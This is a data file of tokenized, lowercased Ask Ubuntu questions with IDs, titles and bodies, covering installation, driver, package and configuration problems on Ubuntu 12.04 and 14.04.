511657	how can you run a ubuntu portable usb on a chrome os computer ?	i am getting two chrome based computers during this holiday season and i want to be able to use some programs that can't/do n't run on chrome os . i 've been searching everywhere for a solution and the only thing i could come up with is a ubuntu portable usb . i created a bootable version of it on my usb , but i am still kinda confused . everytime i test it on my windows 8.1 computer it asked to install , but i do n't want to . i just want it to be something i can plug in and use and unplug and move it to the other chrome computer . basically what i am asking is , how do i create a usb only ubuntu os and how to install programs to it ? ps . i gave it 4gb of persistent file space . i just cant use my ubuntu because my touch screen is busted and i cant install anything without it tapping my screen every second .
511666	ubuntu 14.04 sublime text 2 : file suddenly empty . how to recover it ?	a file that was open by sublime text 2 got suddenly empty . maybe because the disk was full , and the program , that was executing this file , crashed . is there a way to recover the content ? i am using git , but unfortunately i did not commit the last changes : - (
511672	unfixable system crashing after replacing nvidia driver with xorg-server	i was offered a `` hardware upgrade '' in the update center of ubuntu 12.04 and i installed it . then , as i was automatically asked to `` restart the computer to complete the installation '' , i did so . now , the only available screen resolution is 640 * 480 , which is too low to work with and i realize that many graphic functionality that used to work before the upgrade , like window switching between the windows of the same program , do n't work any more . i remember that the upgrade had also something to do with graphic card drivers because they wo n't be supported any more , when i was asked to install them . i have nvidia geforce 9100m g. could you help me with fixing the issue ? thanks edit : i tried going to `` additional drivers '' from system settings and i found out that the only nvidia graphics driver shown there is not activated ; i activated it and restarted my computer and it even became worse ! the resolution came back to it 's previous normal state but graphical functionality is so much buggy that i can not even perform the simplest tasks on my computer- like shutting down , opening system settings , working with terminal , ... - provided that each time i hold the power button to turn my laptop off ( i am unable to shutdown thanks to extremely buggy graphics ) and then turn it on again , a new sequence of strange things happen leading to system crash- screen flashes , not responding to touchpad movements or window commands , not showing the tray of programs on the left side of the screen . i am even unable to work with terminal this way . i would be thankful for any suggestions to fix this . edit : just in case it comes to developers aid for debugging , i have to provide that it frequently presented an error message telling that compiz has stopped working .
511674	14.04 nvidia drivers - no tty / virtual terminal / shell	using a dell m4800 with 14.04 and propriety nvidia drivers . cant access tty via ctrl+alt+f1/f6 i have updated the grub line grub_gfxmode= to a compatible resolution and the grub bootloader shows up perfectly . but still not tty . any pointers ?
511675	is there any application for vimium-like interaction with desktop using keyboard ?	vimium plugin for chrome allows to follow any link on the web-page with the following actions : type f. it causes unique string to appear near every available link . type string associated with the link you wish to follow . such interaction is much quicker for me than using mouse . is there any application for interaction with desktop in similar way ? the only necessary feature is simulating left or right mouse click within any visible and clickable element .
511676	query about a script that makes webcam take an image every x seconds	i have a trust usb webcam . i 'm looking for ( or creating ) a script that could take a screenshot from the camera every 10 seconds and save the image to disc with a timestamp for a filename . i 've found streamer -o 0000.jpeg -s 300x200 -j 100 -t 1 -r 10 but it only runs once and it does n't save the filename as something unique , so when the script starts again it will override the previous files with the same name . any ideas on a script that can start taking timelapse photos when my machine starts up ? thanks .
511677	what command will start debian upgrade ?	i 'm looking for a command that starts verbose terminal version of what can i see after clicking upgrade in update manager : what command ( s ) can do that ?
511684	how to install ubuntu on asus zenfone 5 ?	can anyone help me on installing ubuntu on asus zenfone .
511689	ubuntu 14 lts install via pxe using ks.cfg - no unity after install	i am trying to setup a pxe server with a ks.cfg to automate install . i have an apt-cache based repo . this is to serve as a host for nearly 200 machines . the installation goes fine , but at the end , when the client machine reboots , it ends up in command line , without unity shell . i find that unity shell is not installed . i downloaded the netboot.tar.gz from http : //cdimage.ubuntu.com/netboot/ and used tftpboot and apache to serve the contents . following is my ks.cfg file content . lang en_in langsupport en_in keyboard us mouse timezone -- utc asia/kolkata rootpw -- iscrypted xxxxxxxxxxxxxxxxxx user iiit -- fullname `` xxxx '' -- iscrypted -- password xxxxxxxxxxxxxxx reboot # use text mode install # text install # use web installation # i use the following in preseed file for using an apt-cache repo # d-i mirror/http/proxy string http : //10.0.1.95:3142 bootloader -- location=mbr zerombr yes clearpart -- all -- initlabel part /boot -- fstype ext4 -- size 514 part / -- fstype ext4 -- size 20485 part swap -- size 4098 part /var -- fstype ext4 -- size 15365 part /home -- fstype ext4 -- size 1 -- grow auth -- useshadow -- enablemd5 network -- bootproto=dhcp -- device=eth0 -- hostname=lab-system firewall -- disabled skipx % packages aptitude openssh-server build-essential vim gcc i have commented out the text option .
511691	how to change workspace switcher icon when using more workspaces ?	i have ubuntu 14.04 lts and i would like to see current workspace position while using more than 4 workspaces . when i changed number of ws with compiz-config/unity-tweak/ubuntu tweak i realized that my workspace switcher icon remained unchanged . although i am now using 9 workspaces , icon is still showing 4 and doing nothing when moving between themselves . it 's not very practical to always remember current position . so i was trying another icon , called workspace indicator - http : //www.techdrivein.com/2011/05/10-useful-application-indicators-for.html but i got an importerror : no module named appindicator . i also found adding workspaces manual with immediately changing icon : http : //helpdeskgeek.com/linux-tips/use-more-than-four-workspaces-in-ubuntu-12-04/ but it 's not working for me ( number of ws changed , icon stayed the same ) . could you help me to recognize workspace when using more than four of them ?
511692	how to schedule a shell script using crontab	i want to schedule a shell script to run everyday excluding sunday at 7:30 pm using crontab can you please help
511696	making ubuntu less resource heavy - running slowly for graphic design	so far i have worked for years in the windows environment . i had once again to reinstall the operating system and decided to try ubuntu 14.04 . i like having work environment . quickly and easily search for programs , applications and files . there is a difference in the load on the hardware of the machine - loading the operating system is fast and easy , and the transfer times of data to shorten . however , ubuntu 14.04 seems to me difficult to machine on which i have to work . i work mostly graphic design ( gimp ) photo processing ( past lightroom and is now darktable ) and creating and maintaining websites . currently working on a low machine : ibm think pad r51 , hdd 80 gb , ram 1x 512 mb and 1x 256 mb , intel速 pentium ( r ) m processor 1500mhz , graphics intel速 852gm/855gm x86/mmx/sse2 my question is : who is most appropriate versions of linux , with which the can more lighten the machine especially when working with internet , gimp and darktable ?
511700	touchscreen not detected after install latest ubuntu 14.04	i bought a new ultrabook ( exo brand ) . it cames with win8 , and everything workd fine . after remove win8 and install ubuntu 14.04 the touchscreen and touchpad were not recognized by the so : ls usb , lspci , xinput -- list . i solved the touchpad issue by modifiyng the grub . however i am unable to make the touchscreen to be detected and of couse to work . any ideas ? thans
511702	spotify installed packages have unmet dependencies	i used wine to emulate the windows version of spotify and i recently just uninstalled it and ever since then , when i start up my ubuntu , after a while i will get this restricted logo beside the wifi logo which says : `an error occurred , please run package manager from the right-click menu or apt-get in a terminal to see what is wrong` the error message was : unknown error : ' < class'systemerror ' > ' ( e : malformed line 1in source list/etc/apt/sources.list.d/spotify.list ( dist parse ) ) this usually means that your installed packages have unmet dependencies . just so you know that i have tried the methods on this page and upgraded 10 packages , but the spotify problem is still there .
511704	system settings and pavucontrol report different sound cards	i want to select the soundcard on a per program basis . i read that i could specify that with pavucontrol . however , pavucontrol only sees the currently active sound card , while system settings shows all : i think it is strange that these two programs behave differently , should n't they both use the same backend ? what could i do to solve this problem ? i am using ubuntu 14.04 lts with gnome3 as desktop manager output of uname -a linux kima-laptop 3.13.0-32-generic # 57-ubuntu smp tue jul 15 03:51:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux
511707	once a version of ubuntu crosses eol , can no more packages be installed on it ?	i understand that the official ubuntu website says : when an ubuntu release reaches its âend of lifeâ it receives no further maintenance updates , including critical security upgrades . it is highly recommended that you upgrade to a recent version of ubuntu at this point . does it mean that i can not install anymore packages ? i am using ubuntu 12.10 ( eol - may , 2014 ) . when i tried to install tmux , doing sudo apt-get install tmux the terminal read : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package tmux
511708	installation problem do n't know what to do	i have a problem in installing the ubuntu on my machine that runs windows 8 . i downloaded this file ( ubuntu-14.04.1-desktop-amd64 ) and when i started installing it i got two choices . i selected the last one which is the ( cd boot helper ) . it worked so good until i got this error . the error tells could not retrieve the required installation files for more information , pleas see the log file : c ; \users\sabahk~1\appdata\temp\wubi-14.04-rev286.log
511711	unable to install ubuntu alongside windows 7	i have had my windows 7 installed for about a year in a raid 0 . i shrunk the raid to be able to install ubuntu beside windows 7 but every time i set up the partitions i get the error shown in the image below . it will not let me close the window or do anything with the time zone at all . i can click ok or hit close and nothing happens . anybody ever seen this error .
511712	disable interrupt moderation on ubuntu	i 'm running ubuntu 14.04 on a early 2011 macbook pro . i ca n't seem to find a way to disable interrupt moderation .
511713	error while using make command for kernel recompilation	i 'm doing kernel recompilation and getting this error while using make command /usr/src/linux-3.10.48/arch/x86/makefile:113 : config_x86_x32 enabled but no binutils support /usr/src/linux-3.10.48/scripts/gcc-goto.sh : line 5 : can not create temp file for here-document : no space left on device make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : nothing to be done for `relocs ' . sh : echo : i/o error make : *** [ include/config/kernel.release ] error 1 # df -i filesystem inodes iused ifree iuse % mounted on /dev/sda9 488640 292758 195882 60 % / none 494764 2 494762 1 % /sys/fs/cgroup udev 492079 564 491515 1 % /dev tmpfs 494764 601 494163 1 % /run none 494764 3 494761 1 % /run/lock none 494764 7 494757 1 % /run/shm none 494764 26 494738 1 % /run/user /dev/sda2 0 0 0 - /boot/efi /dev/sda6 142417204 98313 142318891 1 % /media/lenovo/new volume /dev/sda5 134108900 414306 133694594 1 % /media/lenovo/windows8_os /dev/sda7 14504940 22200 14482740 1 % /media/lenovo/lenovo /dev/sda3 0 0 0 - /media/lenovo/lrs_esp # df -h filesystem size used avail use % mounted on /dev/sda9 7.3g 7.2g 0 100 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 1.9g 4.0k 1.9g 1 % /dev tmpfs 387m 1.2m 386m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 544k 1.9g 1 % /run/shm none 100m 40k 100m 1 % /run/user /dev/sda2 256m 31m 226m 13 % /boot/efi /dev/sda6 150g 15g 136g 10 % /media/lenovo/new volume /dev/sda5 223g 95g 128g 43 % /media/lenovo/windows8_os /dev/sda7 25g 12g 14g 45 % /media/lenovo/lenovo /dev/sda3 996m 497m 500m 50 % /media/lenovo/lrs_esp plz check this out and answer me as early as possible . while running make command i also got an error of some 326 mb left .
511717	firefox launched a file by itself	i have a playlist file called /tmp/mp3.m3u in ubuntu ( 14.04 ) . while browsing a completely unrelated website this file was launched automatically , presumably by firefox , as ps auxf shows : \_ /usr/lib/firefox/firefox | \_ /usr/bin/vlc /tmp/mp3.m3u | \_ /usr/lib/firefox/plugin-container /usr/lib/flashplugin-install what would cause it to launch a file on my system ?
511719	hp pavillion dv6 on win8 stuck in black screen while installing 14.04 ubuntu	hp pavilion dv6 on win8 i was installing ubuntu 14.04 using my external hard disk as a usb flash drive . my cpu is a 32 bit laptop . its not progressing past a black screen with cursor on left top .
511720	change owner of internal hard drive partition from root to user 4	i boot the computer from ubuntu live usb hdd and created two new ext4 partitions by moving space from main hdd with gparted partition editor . but finally after rebooting i tired to move and create some folder/files in it but it does n't allows me to do that because its owner is root . how to change it . i tired using different methods . please help me , thanks .
511721	black screen after latest update	sorry if this is a duplicated , but tried to find a solution for my issue with no success after trying several solutions i found on the web . every computer in my company except mine that has dual boot ; is running 14.04 64bits as only os , over amd am1 platforms , all computers are equal in hardware and setup . note that only i have su permissions and every machine has ati proprietary drivers in use . yesterday i got a notification about updates and upgrades , and so i did successfully . after reboot systems freezes at ubuntu logo screen , in every machine i updated so far . tried recovery mode , uninstalled ati prop . drivers , fixed broken packages , tried some boot tweaks over grub and nothing seems to work . report of a boot-fix here http : //paste.ubuntu.com/8048431/ , made in my dual boot machine . thanks for any help . will reinstall and reproduce the steps to try to understand what messed it all up .
511724	automount command in start up manager	how to automount a partition after boot up ? in ubuntu 12.04 it worked via automount command in the start up manager : udisks -- mount /dev/sda5 but it does not work in ubuntu 14.04 . does any one have a suggestion how to accomplish this ? ps : not interested in working with fstab , this method is simpler and works fine for my purpose
511725	how to install universal samsung printer driver ?	i am using ubuntu 12.04 and i wish to install my samsung ml-1676 printer . i googled all possible solutions and tried them , but i 'm not getting any success . please help .
511726	password not accepted after upgrade to 14.04	after upgrade to ubuntu 14.04 , not able to login . reason system says incorrect password . how can i reset my password ? tried most of the thing like reset my password by using recovery mode . but all in vain . under recovery > root > mounted the partition using mount -rw -o remount / on using - > passwd username there is a message followed by enter new unix password : '' no talloc stackframe at ../source3/param/loadparm.c:4864 , leaking memory '' enter new unix password : entered retype new unix password : entered after this i get the message as under passwd : password updated successfully when i try to login with new password , still not able to log in . please help
511729	upgrade ubuntu to version 14.4 taking long time	while i start upgrading to ubuntu 14.4 it stopped in one point since 12 hr . which is configuring python-gpgme and in the terminal last line is : downloading drop-box ... 78 % could any body pls help me i do n't know what shall i do , shall i leave it like that may it be finish by itself ?
511731	how to fix continuous error with ttf-mscorefonts-installer package ?	rough english translation provided by google : i have the same error is coming continuously . i did wipe reload it , but still the same . how can i fix it ? these packages , the package of additional data to be downloaded after installation , but the data was not downloaded or could not be processed . ttf-mscorefonts-installer this package , which is a permanent error on your system unusable . to solve this problem , you must repair your internet connection then you might need to uninstall and then reinstall the packages . my version of ubuntu is 14.04.1 . turkish post , expanded from original : sürekli aynı hata geliyor silip tekrar yükledim fakat hala aynı nasıl düzeltebilirim ? şu paketler , paket kurulumundan sonra ek veri indirilmesini , ama veriler indirilimedi veya işlenemedi . ttf-mscorefonts-installer bu , paketleri sisteminizde kullanılamaz hale getiren kalıcı bir hatadır . bu sorunu çözmek için internet bağlantınızı onarmanız sonra da paketleri kaldırıp tekrar kurmanız gerekebilir . ubuntu sürümüm 14.04.1
511733	does shotwell have no function to save a low quality version of a jpg ?	it often happens that i have to scale down screenshots in quality for forums . if it does not : is there a better software i could use ?
511736	can not solve gpg error	i ran sudo apt-get update and at the end i have these errors : fetched 14,3 kb in 54s ( 264 b/s ) reading package lists ... done w : gpg error : http : //archive.canonical.com saucy release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : //extras.ubuntu.com trusty release : the following signatures could n't be verified because the public key is not available : no_pubkey 16126d3a3e5c1192 w : gpg error : http : //dl.google.com stable release : the following signatures could n't be verified because the public key is not available : no_pubkey a040830f7fac5991 w : gpg error : http : //archive.getdeb.net trusty-getdeb inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey a8a515f046d7e7cf w : gpg error : https : //private-ppa.launchpad.net trusty release : the following signatures could n't be verified because the public key is not available : no_pubkey e131728675254d99 w : gpg error : http : //archive.ubuntu.com trusty release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : //archive.ubuntu.com trusty-updates release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : //archive.ubuntu.com trusty-backports release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : //archive.ubuntu.com trusty-security release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : //archive.ubuntu.com trusty-proposed release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 it seems my missing keys are : 40976eaf437d05b5 3b4fe6acc0b21f32 16126d3a3e5c1192 a040830f7fac5991 a8a515f046d7e7cf e131728675254d99 i saw most of answers say to run : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys [ missing key ] i ran that : $ sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 40976eaf437d05b5 executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- homedir /tmp/tmp.2lrthdou28 -- no-auto-check-trustdb -- trust-model always -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyring /etc/apt/trusted.gpg.d/amandeepgrewal-notifyosdconfig.gpg -- keyring /etc/apt/trusted.gpg.d/apandada1-typhoon.gpg -- keyring /etc/apt/trusted.gpg.d/brightbox-ppa.gpg -- keyring /etc/apt/trusted.gpg.d/chris-lea-node_js-devel.gpg -- keyring /etc/apt/trusted.gpg.d/chris-lea-node_js.gpg -- keyring /etc/apt/trusted.gpg.d/colingille-freshlight.gpg -- keyring /etc/apt/trusted.gpg.d/debian-archive-squeeze-automatic.gpg -- keyring /etc/apt/trusted.gpg.d/debian-archive-squeeze-stable.gpg -- keyring /etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg -- keyring /etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg -- keyring /etc/apt/trusted.gpg.d/diesch-testing.gpg -- keyring /etc/apt/trusted.gpg.d/duh-golang.gpg -- keyring /etc/apt/trusted.gpg.d/ferramroberto-gsharkdown.gpg -- keyring /etc/apt/trusted.gpg.d/finalterm-daily.gpg -- keyring /etc/apt/trusted.gpg.d/fkrull-deadsnakes.gpg -- keyring /etc/apt/trusted.gpg.d/fossfreedom-byzanz.gpg -- keyring /etc/apt/trusted.gpg.d/fossfreedom-packagefixes.gpg -- keyring /etc/apt/trusted.gpg.d/gophers-go.gpg -- keyring /etc/apt/trusted.gpg.d/leolik-leolik.gpg -- keyring /etc/apt/trusted.gpg.d/linrunner-tlp.gpg -- keyring /etc/apt/trusted.gpg.d/mactel-support-ppa.gpg -- keyring /etc/apt/trusted.gpg.d/me-davidsansome-clementine.gpg -- keyring /etc/apt/trusted.gpg.d/michael-gruz-canon-trunk.gpg -- keyring /etc/apt/trusted.gpg.d/michael-gruz-canon.gpg -- keyring /etc/apt/trusted.gpg.d/moka-stable.gpg -- keyring /etc/apt/trusted.gpg.d/numix-ppa.gpg -- keyring /etc/apt/trusted.gpg.d/nuvola-player-builders-beta.gpg -- keyring /etc/apt/trusted.gpg.d/otto-kesselgulasch-gimp-edge.gpg -- keyring /etc/apt/trusted.gpg.d/scopes-packagers-ppa.gpg -- keyring /etc/apt/trusted.gpg.d/shutter-ppa.gpg -- keyring /etc/apt/trusted.gpg.d/steam.gpg -- keyring /etc/apt/trusted.gpg.d/sukso96100-budgie-desktop.gpg -- keyring /etc/apt/trusted.gpg.d/ubuntu-sdk-team-ppa.gpg -- keyring /etc/apt/trusted.gpg.d/ubuntu-x-swat-x-updates.gpg -- keyring /etc/apt/trusted.gpg.d/vajdics-netbeans-installer.gpg -- keyring /etc/apt/trusted.gpg.d/webupd8team-atom.gpg -- keyring /etc/apt/trusted.gpg.d/webupd8team-brackets.gpg -- keyring /etc/apt/trusted.gpg.d/webupd8team-java.gpg -- keyring /etc/apt/trusted.gpg.d/webupd8team-sublime-text-3.gpg -- keyring /etc/apt/trusted.gpg.d/webupd8team-themes.gpg -- keyring /etc/apt/trusted.gpg.d/webupd8team-y-ppa-manager.gpg -- keyserver keyserver.ubuntu.com -- recv-keys 40976eaf437d05b5 gpg : keyblock resource `/etc/apt/trusted.gpg.d/webupd8team-sublime-text-3.gpg ' : resource limit gpg : keyblock resource `/etc/apt/trusted.gpg.d/webupd8team-themes.gpg ' : resource limit gpg : keyblock resource `/etc/apt/trusted.gpg.d/webupd8team-y-ppa-manager.gpg ' : resource limit gpg : requesting key 437d05b5 from hkp server keyserver.ubuntu.com gpg : key 437d05b5 : `` ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > '' not changed gpg : total number processed : 1 gpg : unchanged : 1 i can see unchanged : 1 . i also tried to use y-ppa-manager that also did n't solve the problem . who caused these errors to appear and how can i solve them ?
511737	decent tutorial needed for setting up simple mysql client-server system	could anyone please comment what i have missed during ubuntu setup , that i am allowed to nothing on my system ? always needing to sudo from command line is not practical if you are not familiar with linux syntax , some things i just want to do the graphical way . could anyone point me to comprehensive tutorial on setting up a simple mysql-5.5 client-server system . server : ubuntu virtual machine , client : windows . no special requirements , just want to replace our current ms access database by something more decent . i have done my research , have studied official mysql documentation , but it is not a step-by-step guide . for example it does n't tell you from the start that bind-address must be edited to allow access from the windows client .
511738	does system encryption encrypt /home if it is on a separate hdd ?	this question is similar but it seems to deal with a /home partition on same drive as / partition so not sure if answer would be the same as setup i am proposing . i am hoping to set up my new laptop with / on a ssd and /home on a hdd . ubuntu will be the only os installed . i was just planning to use the system encryption in the installation process . i note that in the answer to this question it is stated that with luks your entire installation ( except /boot ) will be encrypted , including your home directory . i was not planning to use the separate /home encryption as i 'll be the only user on the computer . so if i select the luks encryption will this encrypt my /home partition on the separate hdd or do i need to customise my install in some way to accommodate this ?
511739	ca n't login as root	my user is removed from the sudoers file . i do n't how it got removed because i only have access to my machine . i tried accessing the sudoers file but it mentions my username and asks the password for it like `` [ sudo ] password for arunn : '' . but it does n't accepts the password which i normally use to login to my machine and i hve no problem in it . the problem is when i try to use sudo and gives the error when i give the password and the error message as follows `` arunn is not in the sudoers file . this incident will be reported '' . also i recently added my user name to my virtualbox and will that be the problem ? please i 'm in terriblle situation so help please !
511740	gnome - chrome contextual menu colors inconsistent with current theme	i 've put together an icon/theme combination for my ubuntu 14.04 + gnome . unfortunately , my color settings for contextual menu are applied for most applications , but not for chrome - when i right-click on a website in chrome , the menu that shows up has different highlight and background colors than what i 've designed ( the ones that do show up are quite ugly ! ) . the contextual menu in nautilus looks fine , though . how do i fix that ? is there a separate set of styles for other kinds of contextual menus ?
511741	ubuntu 14.04 firefox internet is getting slower	my problem is , internet is getting slower and some point the screen become a gray color . i 'm using ethernet , not wifi . and i just installed ubuntu 14.04 the day before yesterday . so , basically it can be my computers problem , but how can i check when i having a problem with internet problem ? when it happens , i ca n't scroll or click any links on firefox . i do n't have any clue what to do about it . please tell me , how can i start to solve this problem ?
511743	opening .int files in ubuntu	i recently moved to ubuntu 14.04.1 from windows 8.1 . i am part of a translating crew , and 覺 translate a game now i have the files as .int at windows 覺 was using notepad++ in ubuntu 覺 tried some programs as kate but when i open files i see some rubbish symbols . how can 覺 properly open and edit those files ?
511745	ubuntu not present after install ?	i recently got a new laptop ( toshiba satellite c50-b-14d ) and just installed a new hdd for it and intended to install ubuntu 14.04.1 on it . i must have done this about 5 times now , but after inserting my bootable usb and going through the install process and restarting my laptop it comes up with the message `` reboot and select proper boot device or insert boot media in selected boot device and press a key '' and when i install it again it says ubuntu is already there .
511747	ping non-responsive , inspite of working internet connection	i am running on ubuntu 12.10 . and i am connected to a working , stable internet connection . i can browse using firefox and chrome . but when i try to run ping command in the terminal , no packets are received . hind @ ubuntu : ~ $ ping google.com ping google.com ( 173.194.36.5 ) 56 ( 84 ) bytes of data . i was stuck with the above output for about 5 minutes . more than 200 packets were sent , all lost . help me out .
511750	very small everything on my monitor - lenovo yoga 2 pro	i 've tried this : '' to make permanent ( and also nicer , xrandr scaling doesnât look good ) , create a file /etc/x11/xorg.conf.d/10-monitor.conf with this content : section `` monitor '' identifier `` edp1 '' # 1600x900 59.95 hz ( cvt 1.44m9 ) hsync : 55.99 khz ; pclk : 118.25 mhz modeline `` 1600x900 @ 60 '' 118.25 1600 1696 1856 2112 900 903 908 934 -hsync +vsync option `` preferredmode '' `` 1600x900 @ 60 '' endsection '' but it does n't work . i 'm very new in ubuntu so maybe i 'm missing something ... first i 've created empty xorg.conf.d in x11 folder , then i 've created file with this content . what can i do with my very small everything on lenovo yoga monitor ? ( especcialy browser , zippers etc ... ) . i 've got ubuntu 14.04 . all the content from `` section '' to `` end section '' i 've put to that file .
511751	wubi admin permission in graphic environment and installing question	while i can more or less create directories and such in folders like usr and bin ( `` root directories '' right ) through terminal comfortably ( i say more or less because i set the password through wubi and changed it later into ubuntu itself so i got some conflicting passwords ) i 'd really like to be able to do the same graphically , like in windows , just right-click == > create a new folder . how do i give myself permission to do that ? also , a more general question about linux , sorta newbish but i 'm on a time limit for various reasons , so i 'll just ask here : so far i installed java , it was a tar.gz file , so i put it into /usr/ , extracted it through terminal with : tar xzf eclipse.tar.gz ( again , for some reason doing that right clicking == > extract here gives me a permission denied error ) , then browsed the folder and used sudo apt-get install once it asked me . is it generally how to install stuff on ubuntu ? the only other thing i installed was eclipse and i just needed to double click the executable .
511752	ubuntu 14.04 upgrade kernel failed	i upgrade to ubuntu 14.04 and encounterd a wird problem . ~ $ sudo apt-get dist-upgrade -u lecture des listes de paquets ... fait construction de l'arbre des dépendances lecture des informations d'état ... fait calcul de la mise à jour ... fait 0 mis à jour , 0 nouvellement installés , 0 à enlever et 0 non mis à jour . 1 partiellement installés ou enlevés . après cette opération , 0 o d'espace disque supplémentaires seront utilisés . souhaitez-vous continuer ? [ o/n ] paramétrage de linux-image-3.13.0-34-generic ( 3.13.0-34.60 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.13.0-34-generic vmlinuz ( /boot/vmlinuz-3.13.0-34-generic ) points to /boot/vmlinuz-3.13.0-34-generic ( /boot/vmlinuz-3.13.0-34-generic ) -- doing nothing at /var/lib/dpkg/info/linux-image-3.13.0-34-generic.postinst line 491 . examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.13.0-34-generic /boot/vmlinuz-3.13.0-34-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.13.0-34-generic /boot/vmlinuz-3.13.0-34-generic update-initramfs : generating /boot/initrd.img-3.13.0-34-generic cp : le fichier «/lib/libc.so.5» est ignoré car il a été remplacé durant la copie cp : le fichier «/lib/libc.so.5» est ignoré car il a été remplacé durant la copie cp : le fichier «/lib/libc.so.5» est ignoré car il a été remplacé durant la copie cp : le fichier «/lib/libc.so.5» est ignoré car il a été remplacé durant la copie cp : le fichier «/lib/libc.so.5» est ignoré car il a été remplacé durant la copie e : /usr/share/initramfs-tools/hooks/fixrtc failed with return 1. update-initramfs : failed for /boot/initrd.img-3.13.0-34-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.13.0-34-generic.postinst line 1025. dpkg : error processing package linux-image-3.13.0-34-generic ( -- configure ) : le sous-processus script post-installation installé a retourné une erreur de sortie d'état 2 des erreurs ont été rencontrées pendant l'exécution : linux-image-3.13.0-34-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ~ $ cant find out how to solve this problem . any idea would be appreciate . best , franck
511756	simple logging of ram usage on 14.04	i 'm looking for a very simple logging program that will log ram usage over say 18 hours . i do n't mind if it logs every minute or just records the peak usage . i do n't need it to record any extra details like which process is using what and so on , i do n't need cpu or network usage stats , just how much ram is used . any ideas ? .ap .
511758	upgraded to 14.04 , display issue with split screen	upgraded to 14.04 this morning , which activated split screen mode : i can only imagine this has something to do with graphics drivers . how do i go about diagnosing things ?
511760	installing ubuntu on windows 8.1	hi i have downloaded the 64 bit off ubuntu , put it on a usb stick but when i try to boot it up in windows 8.1 it does not give me the option of booting it , help please
511761	is edubuntu a complete network package ?	i 'm on the board of small private ( christian ) school in houston , tx . we were recently given 10 pc 's with erased hard drives . i am currently an ubuntu user . would edubuntu allow me to set up these pc 's so that any student can log in on any machine and see his/her home directory on a central hard disk ?
511764	want to use ati graphics in ububtu14 !	i 'm new to ubuntu . i have a pavilion dm4 laptop which has a hybrid graphic card . the integrated one is an intel hd graphics family . the discrete card is an ati mobility radeon 5450 . i wanted to some how use my ati graphics card to work but i was never able to find the correct driver for it . i went to ati 's website and downloaded the latest catalyst but it would n't install correctly . i would always get stuck on the boot . is there a way i would be able to use my switchable graphics or if not just use my ati graphics card only ? thanks .
511768	unable to load 1tb usb harddisk in ubuntu 14.04	i do n't know for what reason ubuntu has stopped recognizing my toshiba usb 3.0 external hard disk . i 've looking for an answer in the forums but could n't find the right one . the disk is ntfs and works perfectly well on windows as well as in my lubuntu 14.04 netbook . i 've formatted it but ubuntu wo n't recognize it anyway . lsusb gives me this bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 058f:6364 alcor micro corp. au6477 card reader controller bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 002 : id 046d : c05a logitech , inc. m90/m100 optical mouse bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 046d : c31c logitech , inc . keyboard k120 for business bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 009 device 063 : id 0480 : a007 toshiba america info . systems , inc . external disk usb 3.0 bus 009 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 008 device 002 : id 2109:3431 bus 008 device 001 : id 1d6b:0002 linux foundation 2.0 root hub so the toshiba disk is being recognized in bus 009 device 063 . then i try sudo fdisk -l and i get this : disco /dev/sda : 1000.2 gb , 1000204886016 bytes 255 cabezas , 63 sectores/pista , 121601 cilindros , 1953525168 sectores en total unidades = sectores de 1 * 512 = 512 bytes tamaño de sector ( lógico / físico ) : 512 bytes / 4096 bytes tamaño e/s ( mínimo/óptimo ) : 4096 bytes / 4096 bytes identificador del disco : 0xdc6ae7f1 dispositivo inicio comienzo fin bloques id sistema /dev/sda1 2048 1953521663 976759808 7 hpfs/ntfs/exfat disco /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 cabezas , 63 sectores/pista , 121601 cilindros , 1953525168 sectores en total unidades = sectores de 1 * 512 = 512 bytes tamaño de sector ( lógico / físico ) : 512 bytes / 4096 bytes tamaño e/s ( mínimo/óptimo ) : 4096 bytes / 4096 bytes identificador del disco : 0x4431ddbe dispositivo inicio comienzo fin bloques id sistema /dev/sdb1 * 2048 718847 358400 7 hpfs/ntfs/exfat /dev/sdb2 718848 1848664063 923972608 7 hpfs/ntfs/exfat /dev/sdb3 1848664064 1880664063 16000000 83 linux /dev/sdb4 1880666110 1953523711 36428801 5 extendida la partición 4 no se inició en el limite físico del sector /dev/sdb5 1880666112 1884663807 1998848 